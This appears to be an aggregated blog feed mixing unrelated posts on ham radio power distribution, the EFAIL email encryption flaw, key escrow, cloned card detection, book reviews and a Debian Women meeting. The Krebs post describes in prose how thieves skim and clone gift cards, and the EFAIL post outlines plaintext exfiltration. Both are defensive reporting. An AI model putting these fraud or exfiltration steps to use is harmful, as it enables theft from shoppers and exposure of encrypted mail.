There are a wide range of power distribution units (PDUs) for PowerPole users. Notice that PowerPoles are interchangeable and in some of these devices you can insert power through any of the inputs. Most of these devices have a fuse on every connection for extra security and isolation. Some of the more interesting devices also have a USB charging outlet. The West Mountain Radio RigRunner range includes many permutations. You can find a variety of PDUs from different vendors through an Amazon search or eBay.

In the photo from last week's blog, I have the Fuser-6 distributed by Sotabeams in the UK (below, right). I bought it pre-assembled but you can also make it yourself. I also have a Windcamp 8-port PDU purchased from Amazon (left):

Despite all those fuses on the PDU, it is also highly recommended to insert a fuse in the section of wire coming off the battery terminals or PSU. It is easy to find maxi blade fuse holders on eBay and in some electrical retailers:

Need help crimping your cables?

If you don't want to buy a crimper or you would like somebody to help you, you can bring some of your cables to a hackerspace or ask if anybody from the Debian hams team will bring one to an event to help you.

I'm bringing my own crimper and some PowerPoles to OSCAL this weekend, if you would like to help us power up the demo there please consider contributing to the crowdfunding campaign.

CryptogramDetails on a New PGP Vulnerability

A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim's email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don't mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn't with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: "No decryption in the e-mail client," and "disable HTML rendering."

3. I've been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it's not bug free.

3. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today's announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

I'll post other commentaries and analyses as I find them.

EDITED TO ADD (5/14): News articles.

Slashdot thread.

Cory DoctorowPodcast: Petard, Part 02

Here’s the second part of my reading (MP3) of Petard (part one), a story from MIT Tech Review’s Twelve Tomorrows, edited by Bruce Sterling; a story inspired by, and dedicated to, Aaron Swartz — about elves, Net Neutrality, dorms and the collective action problem.

MP3

Krebs on SecurityDetecting Cloned Cards at the ATM, Register

Much of the fraud involving counterfeit credit, ATM debit and retail gift cards relies on the ability of thieves to use cheap, widely available hardware to encode stolen data onto any card’s magnetic stripe. But new research suggests retailers and ATM operators could reliably detect counterfeit cards using a simple technology that flags cards which appear to have been altered by such tools.

A gift card purchased at retail with an unmasked PIN hidden behind a paper sleeve. Such PINs can be easily copied by an adversary, who waits until the card is purchased to steal the card’s funds. Image: University of Florida.

Researchers at the University of Florida found that account data encoded on legitimate cards is invariably written using quality-controlled, automated facilities that tend to imprint the information in uniform, consistent patterns.

Cloned cards, however, usually are created by hand with inexpensive encoding machines, and as a result feature far more variance or “jitter” in the placement of digital bits on the card’s stripe.

Gift cards can be extremely profitable and brand-building for retailers, but gift card fraud creates a very negative shopping experience for consumers and a costly conundrum for retailers. The FBI estimates that while gift card fraud makes up a small percentage of overall gift card sales and use, approximately $130 billion worth of gift cards are sold each year.

One of the most common forms of gift card fraud involves thieves tampering with cards inside the retailer’s store — before the cards are purchased by legitimate customers. Using a handheld card reader, crooks will swipe the stripe to record the card’s serial number and other data needed to duplicate the card.

If there is a PIN on the gift card packaging, the thieves record that as well. In many cases, the PIN is obscured by a scratch-off decal, but gift card thieves can easily scratch those off and then replace the material with identical or similar decals that are sold very cheaply by the roll online.

“They can buy big rolls of that online for almost nothing,” said Patrick Traynor, an associate professor of computer science at the University of Florida. “Retailers we’ve worked with have told us they’ve gone to their gift card racks and found tons of this scratch-off stuff on the ground near the racks.”

At this point the cards are still worthless because they haven’t yet been activated. But armed with the card’s serial number and PIN, thieves can simply monitor the gift card account at the retailer’s online portal and wait until the cards are paid for and activated at the checkout register by an unwitting shopper.

Once a card is activated, thieves can encode that card’s data onto any card with a magnetic stripe and use that counterfeit to purchase merchandise at the retailer. The stolen goods typically are then sold online or on the street. Meanwhile, the person who bought the card (or the person who received it as a gift) finds the card is drained of funds when they eventually get around to using it at a retail store.

The top two gift cards show signs that someone previously peeled back the protective sticker covering the redemption code. Image: Flint Gatrell.

Traynor and a team of five other University of Florida researchers partnered with retail giant WalMart to test their technology, which Traynor said can be easily and quite cheaply incorporated into point-of-sale systems at retail store cash registers. They said the WalMart trial demonstrated that researchers’ technology distinguished legitimate gift cards from clones with up to 99.3 percent accuracy.

While impressive, that rate still means the technology could still generate a “false positive” — erroneously flagging a legitimate customer as using a fraudulently obtained gift card in a non-trivial number of cases. But Traynor said the retailers they spoke with in testing their equipment all indicated they would welcome any additional tools to curb the incidence of gift card fraud.

“We’ve talked with quite a few retail loss prevention folks,” he said. “Most said even if they can simply flag the transaction and make a note of the person [presenting the cloned card] that this would be a win for them. Often, putting someone on notice that loss prevention is watching is enough to make them stop — at least at that store. From our discussions with a few big-box retailers, this kind of fraud is probably their newest big concern, although they don’t talk much about it publicly. If the attacker does any better than simply cloning the card to a blank white card, they’re pretty much powerless to stop the attack, and that’s a pretty consistent story behind closed doors.”

BEYOND GIFT CARDS

Traynor said the University of Florida team’s method works even more accurately in detecting counterfeit ATM and credit cards, thanks to the dramatic difference in jitter between bank-issued cards and those cloned by thieves.

The magnetic material on most gift cards bears a quality that’s known in the industry as “low coercivity.” The stripe on so-called “LoCo” cards is usually brown in color, and new data can be imprinted on them quite cheaply using a machine that emits a relatively low or weak magnetic field. Hotel room keys also rely on LoCo stripes, which is why they tend to so easily lose their charge (particularly when placed next to something else with a magnetic charge).

In contrast, “high coercivity” (HiCo) stripes like those found on bank-issued debit and credit cards are usually black in color, hold their charge much longer, and are far more durable than LoCo cards. The downside of HiCo cards is that they are more expensive to produce, often relying on complex machinery and sophisticated manufacturing processes that encode the account data in highly uniform patterns.

These graphics illustrate the difference between original and cloned cards. Source: University of Florida.

Traynor said tests indicate their technology can detect cloned bank cards with virtually zero false-positives. In fact, when the University of Florida team first began seeing positive results from their method, they originally pitched the technique as a way for banks to cut losses from ATM skimming and other forms of credit and debit card fraud.

Yet, Traynor said fellow academicians who reviewed their draft paper told them that banks probably wouldn’t invest in the technology because most financial institutions are counting on newer, more sophisticated chip-based (EMV) cards to eventually reduce counterfeit fraud losses.

“The original pitch on the paper was actually focused on credit cards, but academic reviewers were having trouble getting past EMV — as in, “EMV solves this and it’s universally deployed – so why is this necessary?'”, Traynor said. “We just kept getting reviews back from other academics saying that credit and bank card fraud is a solved problem.”

The trouble is that virtually all chip cards still store account data in plain text on the magnetic stripe on the back of the card — mainly so that the cards can be used in ATM and retail locations that are not yet equipped to read chip-based cards. As a result, even European countries whose ATMs all require chip-based cards remain heavily targeted by skimming gangs because the data on the chip card’s magnetic stripe can still be copied by a skimmer and used by thieves in the United States.

The University of Florida researchers recently were featured in an Associated Press story about an anti-skimming technology they developed and dubbed the “Skim Reaper.” The device, which can be made cheaply using a 3D printer, fits into the mouth of ATM’s card acceptance slot and can detect the presence of extra card reading devices that skimmer thieves may have fitted on top of or inside the cash machine.

The AP story quoted a New York Police Department financial crimes detective saying the Skim Reapers worked remarkably well in detecting the presence of ATM skimmers. But Traynor said many ATM operators and owners are simply uninterested in paying to upgrade their machines with their technology — in large part because the losses from ATM card counterfeiting are mostly assumed by consumers and financial institutions.

“We found this when we were talking around with the cops in New York City, that the incentive of an ATM bodega owner to upgrade an ATM is very low,” Traynor said. “Why should they go to that expense? Upgrades required to make these machines [chip-card compliant] are significant in cost, and the motivation is not necessarily there.”

Retailers also could choose to produce gift cards with embedded EMV chips that make the cards more expensive and difficult to counterfeit. But doing so likely would increase the cost of manufacturing by $2 to $3 per card, Traynor said.

“Putting a chip on the card dramatically increases the cost, so a $10 gift card might then have a $3 price added,” he said. “And you can imagine the reaction a customer might have when asked to pay $13 for a gift card that has a $10 face value.”

A copy of the University of Florida’s research paper is available here (PDF).

The FBI has compiled a list of recommendations for reducing the likelihood of being victimized by gift card fraud. For starters, when buying in-store don’t just pick cards right off the rack. Look for ones that are sealed in packaging or stored securely behind the checkout counter. Also check the scratch-off area on the back to look for any evidence of tampering.

Here are some other tips from the FBI:

-If possible, only buy cards online directly from the store or restaurant.
-If buying from a secondary gift card market website, check reviews and only buy from or sell to reputable dealers.
-Check the gift card balance before and after purchasing the card to verify the correct balance on the card.
-The re-seller of a gift card is responsible for ensuring the correct balance is on the gift card, not the merchant whose name is listed. If you are scammed, some merchants in some situations will replace the funds. Ask for, but don’t expect, help.
-When selling a gift card through an online marketplace, do not provide the buyer with the card’s PIN until the transaction is complete.
-When purchasing gift cards online, be leery of auction sites selling gift cards at a steep discount or in bulk.

CryptogramCritical PGP Vulnerability

EFF is reporting that a critical vulnerability has been discovered in PGP and S/MIME. No details have been published yet, but one of the researchers wrote:

We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.

This sounds like a protocol vulnerability, but we'll learn more tomorrow.

News articles.

Planet DebianOlivier Berger: Implementing an example Todo-Backend REST API with Symfony 4 and api-platform

Todo-Backend lists many implementations of the same REST API with different backend-oriented Web development frameworks.

I’ve proposed my own version using Symfony 4 in PHP, and the api-platform project which helps implementing REST APIs.

I’ve documented the way I did it in the project’s documentation in details, for those curious about Symfony development of a very simple REST API (JSON based). See its README file (of course redacted with the mandatory org-mode ;).

You can find the rest of the code here : https://gitlab.com/olberger/todobackend-symfony4.

AFAICS api-platform offers a great set of features for Linked-Data/REST development with Symfony in general. However, some tweaks were necessary to conform the TodoBackend specs, mainly because TodoBackend is JSON only and doesn’t support JSON-LD…

Oh, and the hardest part was deploying on Heroku, making sure that the CORS headers would work as expected :-/

 

 

CryptogramRay Ozzie's Encryption Backdoor

Last month, Wired published a long article about Ray Ozzie and his supposed new scheme for adding a backdoor in encrypted devices. It's a weird article. It paints Ozzie's proposal as something that "attains the impossible" and "satisfies both law enforcement and privacy purists," when (1) it's barely a proposal, and (2) it's essentially the same key escrow scheme we've been hearing about for decades.

Basically, each device has a unique public/private key pair and a secure processor. The public key goes into the processor and the device, and is used to encrypt whatever user key encrypts the data. The private key is stored in a secure database, available to law enforcement on demand. The only other trick is that for law enforcement to use that key, they have to put the device in some sort of irreversible recovery mode, which means it can never be used again. That's basically it.

I have no idea why anyone is talking as if this were anything new. Several cryptographers have already explained why this key escrow scheme is no better than any other key escrow scheme. The short answer is (1) we won't be able to secure that database of backdoor keys, (2) we don't know how to build the secure coprocessor the scheme requires, and (3) it solves none of the policy problems around the whole system. This is the typical mistake non-cryptographers make when they approach this problem: they think that the hard part is the cryptography to create the backdoor. That's actually the easy part. The hard part is ensuring that it's only used by the good guys, and there's nothing in Ozzie's proposal that addresses any of that.

I worry that this kind of thing is damaging in the long run. There should be some rule that any backdoor or key escrow proposal be a fully specified proposal, not just some cryptography and hand-waving notions about how it will be used in practice. And before it is analyzed and debated, it should have to satisfy some sort of basic security analysis. Otherwise, we'll be swatting pseudo-proposals like this one, while those on the other side of this debate become increasingly convinced that it's possible to design one of these things securely.

Already people are using the National Academies report on backdoors for law enforcement as evidence that engineers are developing workable and secure backdoors. Writing in Lawfare, Alan Z. Rozenshtein claims that the report -- and a related New York Times story -- "undermine the argument that secure third-party access systems are so implausible that it's not even worth trying to develop them." Susan Landau effectively corrects this misconception, but the damage is done.

Here's the thing: it's not hard to design and build a backdoor. What's hard is building the systems -- both technical and procedural -- around them. Here's Rob Graham:

He's only solving the part we already know how to solve. He's deliberately ignoring the stuff we don't know how to solve. We know how to make backdoors, we just don't know how to secure them.

A bunch of us cryptographers have already explained why we don't think this sort of thing will work in the foreseeable future. We write:

Exceptional access would force Internet system developers to reverse "forward secrecy" design practices that seek to minimize the impact on user privacy when systems are breached. The complexity of today's Internet environment, with millions of apps and globally connected services, means that new law enforcement requirements are likely to introduce unanticipated, hard to detect security flaws. Beyond these and other technical vulnerabilities, the prospect of globally deployed exceptional access systems raises difficult problems about how such an environment would be governed and how to ensure that such systems would respect human rights and the rule of law.

Finally, Matthew Green:

The reason so few of us are willing to bet on massive-scale key escrow systems is that we've thought about it and we don't think it will work. We've looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there's no detection system for key theft, there's no renewability system, HSMs are terrifically vulnerable (and the companies largely staffed with ex-intelligence employees), and insiders can be suborned. We're not going to put the data of a few billion people on the line an environment where we believe with high probability that the system will fail.

EDITED TO ADD (5/14): An analysis of the proposal.

Worse Than FailureCodeSOD: CONDITION_FAILURE

Oliver Smith sends this representative line:

bool long_name_that_maybe_distracted_someone()
{
  return (execute() ? CONDITION_SUCCESS : CONDITION_FAILURE);
}

Now, we’ve established my feelings on the if (condition) { return true; } else { return false; } pattern. This is just an iteration on that theme, using a ternary, right?

That’s certainly what it looks like. But Oliver was tracking down an unusual corner-case bug and things just weren’t working correctly. As it turns out, CONDITION_SUCCESS and CONDITION_FAILURE were both defined in the StatusCodes enum.

Screenshot of the intellisense which shows CONDITION_FAILURE defined as 2

Yep- CONDITION_FAILURE is defined as 2. The method returns a bool. Guess what happens when you coerce a non-zero integer into a boolean in C++? It turns into true. This method only ever returns true. Ironically, the calling method would then do its own check against the return value, looking to see if it were CONDITION_SUCCESS or CONDITION_FAILURE.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

Planet Linux AustraliaClinton Roy: Actively looking for work

I am now actively looking for work, ideally something with Unix/C/Python in the research/open source/not-for-proft space. My long out of date resume has been updated.

Planet DebianRuss Allbery: Review: Twitter and Tear Gas

Review: Twitter and Tear Gas, by Zeynep Tufekci

Publisher: Yale University Press
Copyright: 2017
ISBN: 0-300-21512-6
Format: Kindle
Pages: 312

Subtitled The Power and Fragility of Networked Protest, Twitter and Tear Gas is a close look at the effect of social media (particularly, but not exclusively, Twitter and Facebook) on protest movements around the world. Tufekci pays significant attention to the Tahrir Square protests in Egypt, the Gezi Park protests in Turkey, Occupy Wall Street and the Tea Party in the United States, Black Lives Matter also in the United States, and the Zapatista uprising in Mexico early in the Internet era, as well as more glancing attention to multiple other protest movements since the advent of the Internet. She avoids both extremes of dismissal of largely on-line movements and the hailing of social media as a new era of mass power, instead taking a detailed political and sociological look at how protest movements organized and fueled via social media differ in both strengths and weaknesses from the movements that came before.

This is the kind of book that could be dense and technical but isn't. Tufekci's approach is analytical but not dry or disengaged. She wants to know why some protests work and others fail, what the governance and communication mechanisms of protest movements say about their robustness and capabilities, and how social media has changed the tools and landscape used by protest movements. She's also been directly involved: she's visited the Zapatistas, grew up in Istanbul and is directly familiar with the politics of the Gezi Park protests, and includes in this book a memorable story of being caught in the Antalya airport in Turkey during the 2016 attempted coup. There are some drier and more technical chapters where she's laying the foundations of terminology and analysis, but they just add rigor to an engaging, thoughtful examination of what a protest is and why it works or doesn't work.

My favorite part of this book, by far, was the intellectual structure it gave me for understanding the effectiveness of a protest. That's something about which media coverage tends to be murky, at least in situations short of a full-blown revolutionary uprising (which are incredibly rare). The goal of a protest is to force a change, and clearly sometimes this works. (The US Civil Rights movement and the Indian independence movement are obvious examples. The Arab Spring is a more recent if more mixed example.) However, sometimes it doesn't; Tufekci's example is the protests against the Iraq War. Why?

A key concept of this book is that protests signal capacity, particularly in democracies. That can be capacity to shape a social narrative and spread a point of view, capacity to disrupt the regular operations of a system of authority, or capacity to force institutional change through the ballot box or other political process. Often, protests succeed to the degree that they signal capacity sufficient to scare those currently in power into compromising or acquiescing to the demands of the protest movement. Large numbers of people in the streets matter, but not usually as a show of force. Violent uprisings are rare and generally undesirable for everyone. Rather, they matter because they demand and hold media attention (allowing them to spread a point of view), can shut down normal business and force an institutional response, and because they represent people who can exert political power or be tapped by political rivals.

This highlights one of the key differences between protest in the modern age and protest in a pre-Internet age. The March on Washington at the height of the Civil Rights movement was an impressive demonstration of capacity largely because of the underlying organization required to pull off a large and successful protest in that era. Behind the scenes were impressive logistical and governance capabilities. The same organizational structure that created the March could register people to vote, hold politicians accountable, demand media attention, and take significant and effective economic action. And the government knew it.

One thing that social media does is make organizing large protests far easier. It allows self-organizing, with viral scale, which can create numerically large movements far easier than the dedicated organizational work required prior to the Internet. This makes protest movements more dynamic and more responsive to events, but it also calls into question how much sustained capacity the movement has. The government non-reaction to the anti-war protests in the run-up to the Iraq War was an arguably correct estimation of the signaled capacity: a bet that the anti-war sentiment would not turn into sustained institutional pressure because large-scale street protests no longer indicated the same underlying strength.

Signaling capacity is not, of course, the only purpose of protests. Tufekci also spends a good deal of time discussing the sense of empowerment that protests can create. There is a real sense in which protests are for the protesters, entirely apart from whether the protest itself forces changes to government policies. One of the strongest tools of institutional powers is to make each individual dissenter feel isolated and unimportant, to feel powerless. Meeting, particularly in person, with hundreds of other people who share the same views can break that illusion of isolation and give people the enthusiasm and sense of power to do something about their beliefs. This, however, only becomes successful if the protesters then take further actions, and successful movements have to provide some mechanism to guide and unify that action and retain that momentum.

Tufekci also provides a fascinating analysis of the evolution of government responses to mass protests. The first reaction was media blackouts and repression, often by violence. Although we still see some of that, particularly against out groups, it's a risky and ham-handed strategy that dramatically backfired for both the US Civil Rights movement (due to an independent press that became willing to publish pictures of the violence) and the Arab Spring (due to social media providing easy bypass of government censorship attempts). Governments do learn, however, and have become increasingly adept at taking advantage of the structural flaws of social media. Censorship doesn't work; there are too many ways to get a message out. But social media has very little natural defense against information glut, and the people who benefit from the status quo have caught on.

Flooding social media forums with government propaganda or even just random conspiratorial nonsense is startlingly effective. The same lack of institutional gatekeepers that destroys the effectiveness of central censorship also means there are few trusted ways to determine what is true and what is fake on social media. Governments and other institutional powers don't need to convince people of their point of view. All they need to do is create enough chaos and disinformation that people give up on the concept of objective truth, until they become too demoralized to try to weed through the nonsense and find verifiable and actionable information. Existing power structures by definition benefit from apathy, disengagement, delay, and confusion, since they continue to rule by default.

Tufekci's approach throughout is to look at social media as a change and a new tool, which is neither inherently good or bad but which significantly changes the landscape of political discourse. In her presentation (and she largely convinced me in this book), the social media companies, despite controlling the algorithms and platform, don't particularly understand or control the effects of their creation except in some very narrow and profit-focused ways. The battlegrounds of "fake news," political censorship, abuse, and terrorist content are murky swamps less out of deliberate intent and more because companies have built a platform they have no idea how to manage. They've largely supplanted more traditional political spheres and locally-run social media with huge international platforms, are now faced with policing the use of those platforms, and are way out of their depth.

One specific example vividly illustrates this and will stick with me. Facebook is now one of the centers of political conversation in Turkey, as it is in many parts of the world. Turkey has a long history of sharp political divisions, occasional coups, and a long-standing, simmering conflict between the Turkish government and the Kurds, a political and ethnic minority in southeastern Turkey. The Turkish government classifies various Kurdish groups as terrorist organizations. Those groups unsurprisingly disagree. The arguments over this inside Turkey are vast and multifaceted.

Facebook has gotten deeply involved in this conflict by providing a platform for political arguments, and is now in the position of having to enforce their terms of service against alleged terrorist content (or even simple abuse), in a language that Facebook engineers largely don't speak and in a political context that they largely know nothing about. They of course hire Turkish speakers to try to understand that content to process abuse reports. But, as Tufekci (a Turkish native) argues, a Turkish speaker who has the money, education, and family background to be working in an EU Facebook office in a location like Dublin is not randomly chosen from the spectrum of Turkish politics. They are more likely to have connections to or at least sympathies for the Turkish government or business elites than to be related to a family of poor and politically ostracized Kurds. It's therefore inevitable that bias will be seen in Facebook's abuse report handling, even if Facebook management intends to stay neutral.

For Turkey, you can substitute just about any other country about which US engineers tend to know little. (Speaking as a US native, that's a very long list.) You may even be able to substitute the US for Turkey in some situations, given that social media companies tend to outsource the bulk of the work to countries that can provide low-paid workers willing to do the awful job of wading through the worst of humanity and attempting to apply confusing and vague terms of service. Much of Facebook's content moderation is done in the Philippines, by people who may or may not understand the cultural nuances of US political fights (and, regardless, are rarely given enough time to do more than cursorily glance at each report).

Despite the length of this review, there are yet more topics in this book I haven't mentioned, such as movement governance. (As both an advocate for and critic of consensus-based decision-making, Tufekci's example of governance in Occupy Wall Street had me both fascinated and cringing.) This is excellent stuff, full of personal anecdotes and entertaining story-telling backed by thoughtful and structured analysis. If you have felt mystified by the role that protests play in modern politics, I highly recommend reading this.

Rating: 9 out of 10

,

Planet DebianNorbert Preining: Gaming: Lara Croft – Rise of the Tomb Raider: 20 Year Celebration

I have to admit, this is the first time that I playing something like this. Somehow, Lara Croft – Rise of the Tomb Raider was on sale, and some of the trailers were so well done that I was tempted in getting this game. And to my surprise, it actually works pretty well on Linux, too – yeah!

So I am a first time player in this kind of league, and had a hard time getting used to controlling lovely Lara, but it turned out easier than I thought – although I guess a controller instead of mouse and kbd would be better. One starts out somewhere in the moutains (I probably bought the game because there is so much of mountaineering in the parts I have seen till now 😉 trying to evade breaking crevices, jumping from ledges to ledges, getting washed away by avalanches, full program.

But my favorite till now in the game is that Lara always carries an ice ax. Completely understandable in the mountain trips, where she climbs frozen ice falls, hanging cliffs, everything, like a super-pro. Wow, I would like to be such an ice climber! BUt even in the next mission in Syria, she still has her ice ax with here, very conveniently dangling from her side. How suuuper-cool!

After being washed away by an avalanche we find Lara back on a trip in Syria, followed and nearly killed by the mysterious Trinity organization. During the Syria operation she needs to learn quite a lot of Greek, unfortunately the player doesn’t have to learn with her – I could need some polishing of my Ancient Greek.

The game is a first-of-its-kind for me, with long cinematic parts between the playing actions. The switch between cinematic and play is so well done that I sometimes have the feeling I need to control Lara during these times, too. The graphics are also very stunning to my eyes, impressive.

I never have played and Lara game or seen and Lara movie, but my first association was to the Die Hard movie series – always these dirty clothes, scratches and dirt covered body. Lara is no exception here. Last but not least, the deaths of Lara (one – at least I – often dies in these games) are often quite funny and entertaining: spiked in some tombs, smashed to pieces by a falling stone column, etc. I really have to learn it the hard way.

I only have finished two expeditions, no idea how many of them are there to come. But seems like I will continue. Good thing is that there are lots of restart points and permanent saves, so if one dies, or the computer dies, one doesn’t have to redo the whole bunch. Well done.

Planet Linux AustraliaFrancois Marier: Running mythtv-setup over ssh

In order to configure a remote MythTV server, I had to run mythtv-setup remotely over an ssh connection with X forwarding:

ssh -X mythtv@machine

For most config options, I can either use the configuration menus inside of of mythfrontend (over a vnc connection) or the Settings section of MythWeb, but some of the backend and tuner settings are only available through the main setup program.

Unfortunately, mythtv-setup won't work over an ssh connection by default and prints the following error in the terminal:

$ mythtv-setup
...
W  OpenGL: Could not determine whether Sync to VBlank is enabled.
Handling Segmentation fault
Segmentation fault (core dumped)

The fix for this was to specify a different theme engine:

mythtv-setup -O ThemePainter=qt

Planet DebianRenata D'Avila: Debian Women in Curitiba

This post is long overdue, but I have been so busy lately that I didn't have the time to sit down and write it in the past few weeks. What have I been busy with? Let's start with this event, that happened back in March:

Debian Women meeting in Curitiba (March 10th, 2018)

The eight women who attended the meeting gathered together in front of a tv with the Debian Women logo

At MiniDebConf Curitiba last year, few women attended. And, as I mentioned on a previous post, there was not even a single women speaking at MiniDebConf last year.

I didn't want MiniDebConf Curitiba 2018 to be a repeat of last year. Why? In part, because I have involved in other tech communities and I know it doesn't have to be like that (unless, of course, the community insists in being mysoginistic...).

So I came up with the idea of having a meeting for women in Curitiba one month before MiniDebConf. The main goal was to create a good enviroment for women to talk about Debian, whether they had used GNU/Linux before or not, whether they were programmers or not.

Miriam and Kira, two other women from the state of Parana interested in Debian, came along and helped out with planning. We used a collaborative pad to organize the tasks and activities and to create the text for the folder about Debian we had printed (based on Debian's documentation).

For the final version of the folder, it's important to acknowledge the help Luciana gave us, all the way from Minas Gerais. She collaborated with the translations, reviewed the texts and fixed the layout.

A pile with folded Debian Women folders. The writings are in Portuguese and it's possible to see a QR code.

The final odg file, in Portuguese, can be downloaded here: folder_debian_30cm.odg

Very quickly, because we had so little time (we settled on a date and a place a little over one month before the meeting), I created a web page and put it online the only way I could at that moment, using Github Pages. https://debianwomenbr.github.io

We used Mate Hackers' instance of nos.vc to register for the meeting, simply because we had to plan accordingly. This was the address for registration: https://encontros.matehackers.org/pt/projects/60-encontro-debian-women

Through the Training Center, a Brazilian tech community, we got to Lucio, who works at Pipefy and offered us the space so we could hold the meeting. Thank you, Lucio, Training Center and Pipefy!

Pipefy logo

Because Miriam and I weren't in Curitiba, we had to focus the promotion of this meeting online. Not the ideal when someone wants to be truly inclusive, but we worked with the resources we had. We reached out to TechLadies and invited them - as we did with many other groups.

This was our schedule:

Morning

09:00 - Welcome coffee

10:00 - What is Free Software? Copyright, licenses, sharing

10:30 - What is Debian?

12:00 - Lunch Break

Afternoon

14:30 - Internships with Debian - Outreachy and Google Summer of Code

15:00 - Install fest / helping with users issues

16:00 - Editing the Debian wiki to register this meeting https://wiki.debian.org/DebianWomen/History

17:30 - Wrap up

Take outs from the meeting:

  • Because we knew more or less how many people would attend, we were able to buy the food accordingly right before the meeting - and ended up spending much less than if we had ordered some kind of catering.

  • Sadly, it would be almost as expensive to print a dozen of folders than it would be to print out hundred of them. So we ended up printing 100 folders (which was expensive enough). The good part is that we would end up handing them out during MiniDebConf Curitiba.

  • We attempted a live stream of the meeting using Jitsi, but I don't think we were very successful, because we didn't have a microphone for the speakers.

  • Most of our public ended up being women who, in fact, already knew and/or used Debian, but weren't actively involved with the community.

  • It was during this meeting that the need for a mailing list in Portuguese for women interested in Debian came up. Because, yes, in a country where English is taught so poorly in the schools, the language can still be a barrier. We also wanted to keep in touch and share information about the Brazilian community and what we are doing. We want next years' DebConf to have a lot of women, specially Brazilian women who are interested and/or who are users and/or contribute to Debian. The request for this mailing list would be put through by Helen during MiniDebConf, using the bug report system. If you can, please support us: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895575

Pictures from the meeting:

The breakfast table with food

Our breakfast table!

Miriam telling the women about Free Software, six women listening

Miriam's talk: What is Free Software? Copyright, licenses, sharing

Renata and Miriam talking about What is Debian a tv among them shows the title of the talk

Miriam and Renata's talk: What is Debian?

Renata talking about internships with Debian

Renata talking about internships with Debian

Thank you to all the women who participated!

The participants with the two men who helped with the meeting.

And to our lovely staff. Thank you, Lucio, for getting us the space and thank you, Pipefy!

This has been partly documented at Debian Wiki (DebianWomen/History) because the very next day after this meeting, Debian Wiki completely blocked ProtonVPN from even accessing the Wiki. Awesome. If anyone is able to, feel free to copy/paste any of this text there.

Planet DebianRuss Allbery: Review: Deep Work

Review: Deep Work, by Cal Newport

Publisher: Grand Central
Copyright: January 2016
ISBN: 1-4555-8666-8
Format: Kindle
Pages: 287

If you follow popular psychology at all, you are probably aware of the ongoing debate over multitasking, social media, smartphones, and distraction. Usually, and unfortunately, this comes tainted by generational stereotyping: the kids these days who spend too much time with their phones and not enough time getting off their elders' lawns, thus explaining their inability to get steady, high-paying jobs in an economy designed to avoid steady, high-paying jobs. However, there is some real science under the endless anti-millennial think-pieces. Human brains are remarkably bad at multitasking, and it causes significant degredation of performance. Worse, that performance degredation goes unnoticed by the people affected, who continue to think they're performing tasks at their normal proficiency. This comes into harsh conflict with modern workplaces heavy on email and chat systems, and even harsher conflict with open plan offices.

Cal Newport is an associate professor of computer science at Georgetown University with a long-standing side profession of writing self-help books, initially focused on study habits. In this book, he argues that the ability to do deep work — focused, concentrated work that pushes the boundaries of what one understands and is capable of — is a valuable but diminishing skill. If one can develop both the habit and the capability for it (more on that in a moment), it can be extremely rewarding and a way of differentiating oneself from others in the same field.

Deep Work is divided into two halves. The first half is Newport's argument that deep work is something you should consider trying. The second, somewhat longer half is his techniques for getting into and sustaining the focus required.

In making his case for this approach, Newport puts a lot of effort into avoiding broader societal prescriptions, political stances, or even general recommendations and tries to keep his point narrow and focused: the ability to do deep, focused work is valuable and becoming rarer. If you develop that ability, you will have an edge. There's nothing exactly wrong with this, but much of it is obvious and he belabors it longer than he needed to. (That said, I'm probably more familiar with research on concentration and multitasking than some.)

That said, I did like his analysis of busyness as a proxy for productivity in many workplaces. The metrics and communication methods most commonly used in office jobs are great at measuring responsiveness and regular work on shallow tasks in the moment, and bad at measuring progress towards deeper, long-term goals, particularly ones requiring research or innovation. The latter is recognized and rewarded once it finally pays off, but often treated as a mysterious capability some people have and others don't. Meanwhile, the day-to-day working environment is set up to make it nearly impossible, in Newport's analysis, to develop and sustain the habits required to achieve those long-term goals. It's hard to read this passage and not be painfully aware of how much time one spends shallowly processing email, and how that's rewarded in the workplace even though it rarely leads to significant accomplishments.

The heart of this book is the second half, which is where Deep Work starts looking more like a traditional time management book. Newport lays out four large areas of focus to increase one's capacity for deep work: create space to work deeply on a regular basis, embrace boredom, quit social media, and cut shallow work out of your life. Inside those areas, he provides a rich array of techniques, some rather counter-intuitive, that have worked for him. This is in line with traditional time management guidance: focus on a few important things at a time, get better at saying no, put some effort into planning your day and reviewing that plan, and measure what you're trying to improve. But Newport has less of a focus on any specific system and more of a focus on what one should try to cut out of one's life as much as possible to create space for thinking deeply about problems.

